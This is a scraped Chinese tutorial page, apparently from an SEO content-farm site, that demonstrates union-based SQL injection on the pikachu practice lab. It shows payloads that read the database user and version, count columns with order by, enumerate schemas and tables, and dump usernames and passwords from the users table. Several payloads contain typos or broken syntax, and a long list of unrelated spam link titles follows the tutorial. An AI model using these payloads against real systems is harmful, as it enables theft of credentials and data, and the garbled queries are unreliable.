当前位置: 首页 > wzjs >正文

vi设计公司平台哪个好整站seo

vi设计公司平台哪个好,整站seo,珠海网站制作推广公司哪家好,wordpress可以干啥利用注入点让SQL注入语句执行读取数据库数据相关的操作! 以下均以pikachu靶场的字符型注入为例进行介绍说明 一、读取用户名,数据库版本信息 在原URL后面添加如下代码: union select user(),version()-- 效果: 补…

利用注入点让SQL注入语句执行读取数据库数据相关的操作!

以下均以pikachu靶场的字符型注入为例进行介绍说明

一、读取用户名,数据库版本信息

在原URL后面添加如下代码:

   ' union select user(),version()--+

效果: 

补充:判断查询的字段个数order by

这时,就需要在相应环境下进行测试判断:主要是使用 order by 来判断

在后面添加1,2,3,4,5,6....进行测试,直到不再报错!就判断出了其查询字段个数

如下:

 二、读取mysql所有库名

在原URL后面添加如下语句:

‘ union select 1,group_concat(schema_name) from information_schema,schemata+--+

 效果:

三、读取pikachu库的所有表名

在原URL后面添加如下语句:

’unnion select 1,group_concat(table_name) from information_schema.tables where table_schema=database+--+

效果:

 

四、读取所有字段数据

在原URL后面添加如下语句:

‘ union select 1,group_concat(id,0x7c,username,0x7c,password,0x7c,level,0x7c) from users+--+

效果:

http://www.dtcms.com/wzjs/261731.html

相关文章:

  • html怎么做网站十大网络推广公司
  • 哈尔滨建设部网站如何推广公司网站
  • php开发网站建设百度推广的四种收费形式
  • 装饰设计公司名字seo职业培训学校
  • 新媒体做图网站google开户
  • 做网站建设给人销售大数据网站
  • 阿里云腾讯云网站建设电子商务主要学什么内容
  • wordpress速度主题单页网站seo优化
  • 汽车配件销售网站开发论文百度网站名称和网址
  • 网站后来功能网络营销推广8种方法
  • 建设网站需要哪些材料百度官网下载电脑版
  • 深圳做网站个人今天的重要新闻
  • 做网站美工收费西安霸屏推广
  • 聊城门户网站青岛网站建设公司电话
  • wordpress 文章文件夹seo图片优化的方法
  • wordpress调用菜单函数福州seo快速排名软件
  • 宝宝投票网站怎么做的郑州网站网页设计
  • 腾讯云做视频网站吗色盲测试图片
  • wordpress不在根目录郑州百度推广seo
  • 兴义做网站谷歌chrome官网
  • 网站开发培训费百度站长号购买
  • 美的网站建设规划书营销推广软文
  • 学做网站论坛vip账号破解网站seo系统
  • 大型网站开发java精准获客
  • 工业品一站式采购平台全网营销
  • 洛阳网络建站百度网站收录入口
  • 关于公司网站建设方案收集微博推广方法有哪些
  • 历下区网站建设公司网络营销与传统营销有哪些区别
  • 网站弹窗广告怎么做sem推广竞价
  • 湛江城乡建设网站360优化大师官方下载最新版